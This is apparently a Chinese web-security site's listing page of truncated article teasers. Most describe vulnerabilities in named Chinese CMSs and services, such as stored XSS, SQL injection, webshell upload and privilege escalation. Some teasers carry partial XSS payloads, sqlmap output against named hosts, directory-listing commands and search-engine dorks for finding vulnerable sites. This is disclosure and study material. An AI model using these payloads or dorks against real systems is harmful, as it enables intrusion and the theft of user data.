QQ邮箱存某处储型xss - 网站安全 - 自学php关注热度:22

回复邮件时可能执行任意代码直接用了innerHTML吐槽无力..[详情]

绕过安全狗用户限制提权 - 网站安全 - 自学php关注热度:26

你还在为有安全狗而不能添加用户而烦恼么？那快来看~只需三步，在最新服务器安全狗4 0 05221账号保护全开的状态下，我是如何用guest获取登陆权限的 前提是要有提权exp哦~服务器安全狗..[详情]

伪造修改头信息 XSS盲打得Cookies - 网站安全 - 自学关注热度:27

最近看了一本书，一个老外写的，其中有一篇关于【修改主机头，恶意攻击】【一些CMS的后台,有一个功能,可以显示访问者的客户端信息,比如说访问者的浏览器版本,或者访问者使用的..[详情]

access防下载表原理 - 网站安全 - 自学php关注热度:23

一、开篇 自从搞ASP+ACCESS没少为避免数据库下载而伤过神，网上的奇淫技巧更是数不胜数，本文就是同大家共同探讨各路前辈的留下的秘笈并指中其中的优劣，最后为大家提供一种最佳的..[详情]

PHP168 6.0及以下版本login.php存重大安全漏洞 - 网站关注热度:25

问题很大，最好不要忽视。。。。利用代码将php木马插入到cache 目录里轻松获得webshell，可批量。利用搜索引擎搜索Powered by php168 v6或者一下版本v5、v4、v3、v2、v1会搜索到很多很多相关的..[详情]

Chrome 是怎么过滤反射型 XSS 的呢？ - 网站安全关注热度:19

首先要说明的是它是webkit的一个模块,而非chrome,所以Safari和360安全浏览器极速模式等webkit内核的浏览器都有XSS过滤功能 过滤方式:通过模糊匹配 输入参数(GET query| POST form data| Location frag..[详情]

XSS和字符集的那些事儿 - 网站安全 - 自学php关注热度:54

0x00 前言在文章的开头,我想对上次发布了一个结论及其离谱但还算及时被删除了的 文章(关于跨域字符集继承的那篇)道个歉。也希望没有测试就去转载的那些人,可以把那个文章删除了。..[详情]

恶意网站小谈 - 网站安全 - 自学php关注热度:17

昨天写了第一篇文章，讲讲被黑的网站，有些同学觉得不够深入，让分享点干货，讲讲怎么使用黑帽手法提高流量，说实在的，这属于SEO知识范畴，对SEO不是很熟，所以这个就没办法实..[详情]

如何从网站开发角度提高php安全漏洞的防范 - 网关注热度:26

目前PHP因其功能强大、入门简单、代码执行效率高等优点，成为了Web应用开发的流行语言。由于使用广泛，所以利用PHP安全漏洞对Web网站进行的攻击也越来越多，这给Web应用的安全带来..[详情]

Web安全初探-SQL注入 - 网站安全 - 自学php关注热度:25

一、SQL注入SQL注入是一种利用应用程序数据库层出现的安全漏洞的代码注入技术。通常在一些场景容易发生，比如用户输入的内嵌于SQL语句里的转义字符没有被正确的过滤掉或用户输入..[详情]

ShopEx分销平台sql注入漏洞导致用户信息泄露 - 网关注热度:97

注入点：http: www fengxiaowang cn:80 article php?aa_id=* (GET)sqlmap identified the following injection points with a total of 184 HTTP(s) requests:---Place: URIParameter: 1*..[详情]

ShopEx短信通系统sql注入（POST） - 网站安全 - 自学关注热度:92

ShopEx无线营销系统，1400多个库网站：http: live shopex cn 注入点http: live shopex cn:80 index php passport passport sel_region (POST)参数p_region_idsqlmap identified the following injection..[详情]

大汉版通JCMS数据库配置文件读取漏洞 - 网站安全关注热度:47

大汉JCMS内容管理系统由于对文件读取时没有对文件路径进行过滤，导致可以直接直接读取数据库配置文件，可导致数据库泄露或者getshell由于读取xml文件时没有对传进的参数进行过滤，..[详情]

新浪邮箱存储型XSS 第二弹 - 网站安全 - 自学php关注热度:28

过滤机制不完善导致可植入恶意代码缺点是Firefox only 优点是无须用户交互。在邮件正文插入：svguse xlink:href=data:image svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmc..[详情]

新浪邮箱存储型XSS（字符集缺陷） - 网站安全关注热度:33

触发条件比较苛刻，但还是觉得应该提交一下先说一下字符集缺陷的问题 字符集[ISO-2022-KR]会把以 x0E;开头 x0F;结尾的一串字符看作是2 bytes也就是一个字符。换句话来说，它可以帮助我们..[详情]

ECSHOP后台注入 - 网站安全 - 自学php关注热度:19

ECSHOP 后台注入漏洞 刚挖的 热乎的。。之前分次提交是因为 一边挖一边提交的admin favourable phpif ($_REQUEST[ 39;act 39;] == 39;list 39;){ admin_priv( 39;favourable 39;);function..[详情]

YXcmsApp注入 - 网站安全 - 自学php关注热度:47

这楼的没啥技术含量，本菜鸟刚接触代码审计，可能分析的不对。漏洞文件protected apps default controller indexController php关键代码public function search(){ if(empty($_GET[ 39;keywords..[详情]

瑞丽网APP应用API接口又一处注射 - 网站安全 - 自关注热度:21

瑞丽网IPHONE端 APP应用接口存在注入，可能会导致用户信息受到威胁，通过漏洞可以通过变量读取服务器信息，望管理员速度修复,防止被他人恶意利用。POST rlw getTopic php HTTP 1 1Host: api r..[详情]

优酷某分站命令执行漏洞(已证明可内网渗透) -关注热度:25

优酷某分站命令执行漏洞可SHELL，可内网渗透Target: http: channel 3g youku com ykmks login doWhoami: rootWebPath: opt www ykmks webapps ykmksOS Name: LinuxOS Version: 2 6 18-194 el5Java Home:..[详情]

新网虚拟主机提权 - 网站安全 - 自学php关注热度:52

手头有个新网虚拟主机的webshell，想提权，一直未果，也搜索不到任何有价值的信息。貌似讨论新网提权的很少。貌似是新网的虚拟主机吧，俺也不清楚，对照下图的表： 80%的确定是新..[详情]

for命令跨目录 读文件 写文件 - 网站安全 - 自学关注热度:37

c for d %i in (D: VirtualHost 8090sec www *) do @echo %i 列目录 c for r D: VirtualHost 8090sec www %i in (* *) do @echo %i 浏览目录 c for f %c in (D: VirtualHo..[详情]

防止.NET木马列所有站物理路径，aspxspy木马简单防关注热度:34

aspxspy 此木马是一个 NET程序制作，如果你的服务器支持 NET那就要注意了，进入木马有个功能叫：IIS Spy，点击以后可以看到所有站点所在的物理路径。以前有很多人提出过，但一直没有人..[详情]

php安全模式详细介绍 - 网站安全 - 自学php关注热度:34

php ini中找safe_modephp安全模式：safe_mode=on|off启用safe_mode指令将对在共享环境中使用PHP时可能有危险的语言特性有所限制。on启用，off禁用。它会比较执行脚本UID（用户ID）和脚本尝试访问..[详情]

ThinkSNS修改任意账号用户名和密码（包括管理员）关注热度:32

由于某处修改未做判断，导致直接可以修改用户账号信息(包括管理员)更换邮箱激活-修改任何uid的邮箱-登陆-使用修改的那个邮箱找回密码由于index php?app=publicmod=Registeract=changeActivationE..[详情]

Destoon全版本通杀SQL注入2 - 网站安全 - 自学php关注热度:17

个人觉得不应该仅仅只检测用户的输入，而应该在SQL查询前进行检测才能更好的起到防注入的效果吧，因为人总是有遗漏的。common inc php 0x00if(!empty($_SERVER[ 39;REQUEST_URI 39;])) strip_uri($_SER..[详情]

PHPCMS最新版存储型xss（附多种利用方法） - 网站关注热度:22

PHPCMS文章投稿处存在存储型的XSS漏洞,也许当你看到标题的时候,你心里会想：楼主简直太不厚道了,不就一个XSS嘛,标题却来个代码执行 别慌,一个漏洞所造成的威胁,本人觉得并不在于其本..[详情]

撞库攻击：一场需要用户参与的持久攻防战 - 网关注热度:32

一、背景：用户数据泄露一直是如今互联网世界的一个焦点，从最近的京东撞库抹黑事件，到之前的CSDN，如家用户数据的泄露，服务商和黑客之间在用户数据这个舞台上一直在进行着旷..[详情]

人人网某分站存储型xss第二弹 - 网站安全 - 自学关注热度:31

存储型xss，可打cookie，引用某牛的话勿头痛医头脚痛医脚详细说明：http: dellcqg renren com Qa ask 单引号被转义构造img src=1 onerror=document body appendChild(document createElement(String fromCh..[详情]

洽洽食品某系统IIS配置不当导致任意代码执行关注热度:30

IIS配置不当致使任意代码执行，旗下多站沦陷，上市公司大量采购、财务数据可查其实问题很简单1 WEB服务器扩展里设置WebDAV为允许2 网站权限配置里开启了写入权限http: iservice qiaqiafoo..[详情]

08cms通用oday - 网站安全 - 自学php关注热度:38

通杀08cms所有版本通用型SQL注射谷歌关键字inurl:member index php?ugid31=51在网站后面加上 admina php就是后台随便找个站点就可以注射官方的演示站点也可以秒进后台http: auto 08cms com member index..[详情]